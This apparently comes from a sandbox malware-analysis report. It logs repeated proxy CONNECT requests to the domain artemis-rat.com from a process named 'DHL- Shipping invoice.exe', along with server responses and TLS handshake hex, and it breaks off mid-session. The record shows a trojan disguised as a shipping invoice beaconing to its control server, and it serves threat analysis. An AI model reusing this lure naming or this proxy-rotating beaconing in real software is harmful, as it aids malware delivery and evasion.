                            Mar 12, 2024 08:37:07.265738964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.766006947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.563342094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.062942982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.562772989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.062633038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.062611103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1806192.168.2.45532677.91.74.77806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.847404003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.055226088 CET129INHTTP/1.1 301 Moved Permanently
                            Location: https://artemis-rat.com:443
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1807192.168.2.454561210.95.145.22631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.859210968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.932506084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:35.284313917 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1808192.168.2.455374159.65.245.255806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.862874031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.249918938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.641058922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.343898058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.640779972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.950355053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250137091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.750107050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.640801907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1809192.168.2.455397104.25.194.175806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.967521906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.055442095 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1810192.168.2.455205103.90.227.24431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.967967033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.765753984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:23.957097054 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1811192.168.2.455407104.16.109.207806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.968081951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.055907011 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1812192.168.2.455219143.64.8.2180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.968170881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1813192.168.2.450739148.72.23.56393966484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.968230963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.046806097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.140887976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.250390053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:31.249782085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1814192.168.2.455230128.199.165.63344386484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.968321085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.765697002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.859473944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.866089106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.859622955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.859416962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1815192.168.2.454614170.245.57.22880806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.969386101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1816192.168.2.45543023.227.38.198806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.969468117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.056371927 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1817192.168.2.453394161.97.173.78491456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.969530106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1818192.168.2.45532335.72.118.126806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.969563007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.253098011 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:07.349395037 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 22 5c 98 c6 ee 09 79 fd 0b 13 8b 21 10 a4 66 d6 30 1f 77 29 46 c5 4b 13 19 a2 72 1d 53 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: e"\y!f0w)FKrS*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:07.633157969 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 48 e9 75 ac 21 f9 e2 e3 d5 b3 ee fe 14 45 4f 2d 95 c6 b8 fd 83 34 19 5d 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9Hu!EO-4]DOWNGRD0000*H010Uartemis-rat.com0240312070904Z260312070904Z010Uartemis-rat.com0"0*H0sr7vM
                            Mar 12, 2024 08:37:08.019021988 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 c4 cb 66 94 b6 af 61 4f a0 63 5e a2 cf 59 9a a5 3e 1a 1f 99 2e a7 53 46 da 70 fe 30 44 fc 3e 1f 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 d1 94 ff e0 20 e8 4a b5 b4 71 80 f6 d3 47 0d 80 2f 1f 70 ca 16
                            Data Ascii: %! faOc^Y>.SFp0D>( JqG/pD6WU
                            Mar 12, 2024 08:37:08.589314938 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 27 81 00 ff 2d bc 33 4a 8f f4 99 67 ad 19 9e 58 8f 9a cc 34 96 19 78 82 42 a1 9f 91 d5 13 98 f4 00 f2 5e b6 55 25 82 d0
                            Data Ascii: ('-3JgX4xB^U%


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1819192.168.2.4553605.75.192.13806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.972583055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1820192.168.2.455454104.27.8.161806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.972850084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.060910940 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1821192.168.2.45428067.201.33.10252836484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.974030018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1822192.168.2.453415213.202.230.241806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.976365089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.062648058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.244565964 CET76INHTTP/1.0 200 Connection Established
                            Proxy-agent: Apache/2.4.41 (Ubuntu)


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1823192.168.2.455318203.218.172.22580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.983074903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1824192.168.2.45529341.242.116.150500036484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.988512993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.765753031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.859554052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.066158056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.360965014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.750221014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1825192.168.2.455175103.118.46.6180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.988513947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1826192.168.2.45529661.178.152.3173026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.988601923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.319401979 CET90INHTTP/1.1 200 OK
                            Content-Type: application/json
                            Connection: close
                            Content-Length: 55


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1827192.168.2.45501864.227.108.25319086484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.988770008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
